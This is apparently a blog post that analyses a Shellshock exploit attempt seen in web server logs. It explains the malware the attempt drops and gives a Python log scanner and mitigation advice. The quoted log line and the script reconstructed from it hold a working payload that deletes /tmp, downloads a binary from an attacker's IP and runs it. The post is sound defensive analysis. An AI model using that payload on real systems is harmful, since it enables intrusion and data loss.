Nice Try !
17 Mar 2015
Weird logs
Watch your web logs, you’ll see some people do sometimes try very hard:

```
renzokuken.eu:80 222.186.21.115 - - [16/Mar/2015:06:50:59 +0100] "GET / HTTP/1.1" 403 426 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.21.115:999/udso -O /tmp/China.Z-dmhi >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-dmhi >> /tmp/Run.sh;echo /tmp/China.Z-dmhi >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.21.115:999/udso -O /tmp/China.Z-dmhi >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-dmhi >> /tmp/Run.sh;echo /tmp/China.Z-dmhi >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
```
# Most advanced threat ever
## Exploit
Those are some nice `Referer` and `User-Agent`. They are actually the same string and try to exploit CVE-2014-6271, the so-called ‘Shellshock’ bug.
On an unpatched system, this exploit will:

- Remove your stuff from `/tmp/`. It will actually leave files/dirs that start with a ‘.’
- Make a script `/tmp/Run.sh` with the following content:

  ```sh
  wget http://222.186.21.115:999/udso -O /tmp/China.Z-dmhi
  echo By China.Z
  chmod 777 /tmp/China.Z-dmhi
  /tmp/China.Z-dmhi
  rm -rf /tmp/Run.sh
  ```

- Run `/tmp/Run.sh`
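Spotting these attempts in your own logs is easy once you know the trigger is the `() {` function-definition prefix at the start of a header value. The following is an added example (not code from the original post): it parses Apache combined-format lines like the one above, optionally prefixed with the vhost, and reports which header fields carry the Shellshock trigger together with the response status, so you can tell a refused probe (403) from one that reached a CGI script. The sample log lines, hostnames and 192.0.2.x addresses are constructed for the example.

```python
import re

# Apache "combined" log line, with an optional leading "vhost:port" field
# as in the log shown above. Quoted fields may contain backslash-escaped quotes.
COMBINED_RE = re.compile(
    r'^(?:(?P<vhost>\S+)\s+)?(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# CVE-2014-6271 trigger: a bash function definition "() {" in an environment
# value. Whitespace inside is optional, which also catches the "(){" variant.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample lines (not real traffic); 192.0.2.0/24 is the RFC 5737 documentation range.
SAMPLE_LOG = [
    'example.org:80 192.0.2.10 - - [16/Mar/2015:06:50:59 +0100] "GET / HTTP/1.1" 200 512 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    'example.org:80 192.0.2.20 - - [16/Mar/2015:06:51:03 +0100] "GET /cgi-bin/status HTTP/1.1" 403 426 '
    '"() { :; }; /bin/bash -c \\"echo shellshock-test\\"" "() { :; }; /bin/bash -c \\"echo shellshock-test\\""',
    '192.0.2.30 - - [16/Mar/2015:06:52:10 +0100] "GET /index.html HTTP/1.1" 200 1024 '
    '"http://example.org/" "() {:;}; echo shellshock-test"',
]


def parse_combined(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def shellshock_hits(line):
    """Return the names of the fields in `line` that carry the Shellshock trigger."""
    rec = parse_combined(line)
    if rec is None:
        return []
    return [f for f in ("request", "referer", "agent") if SHELLSHOCK_RE.search(rec[f])]


def scan(lines):
    """Return (client_ip, status, hit_fields) for every line that looks like a Shellshock probe."""
    findings = []
    for line in lines:
        hits = shellshock_hits(line)
        if hits:
            rec = parse_combined(line)
            findings.append((rec["ip"], rec["status"], hits))
    return findings


if __name__ == "__main__":
    for ip, status, fields in scan(SAMPLE_LOG):
        print(f"{ip} status={status} shellshock trigger in: {', '.join(fields)}")
```

A 200 next to a `/cgi-bin/` request with the trigger in a header is the line worth investigating; a 403 like the one above means the request never reached a script.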
## Malware
The `udso` file is ‘packed’ with UPX (strings, lol) and is actually a big (1.5M) statically linked executable.
It asks Google’s DNS at 8.8.8.8 for the IP of 2015.lnuxx.pw (which is currently 222.186.21.42), then connects to it on port 10991 and proceeds to send some info about the system it’s in, with some plaintext strings. Most advanced!
## Mitigation
- Keep your system updated
- Don’t run CGI scripts on your webserver
- Configure firewalls on your servers
- Use your own DNS servers
Any one of those will protect you from the evil Chinese-fu.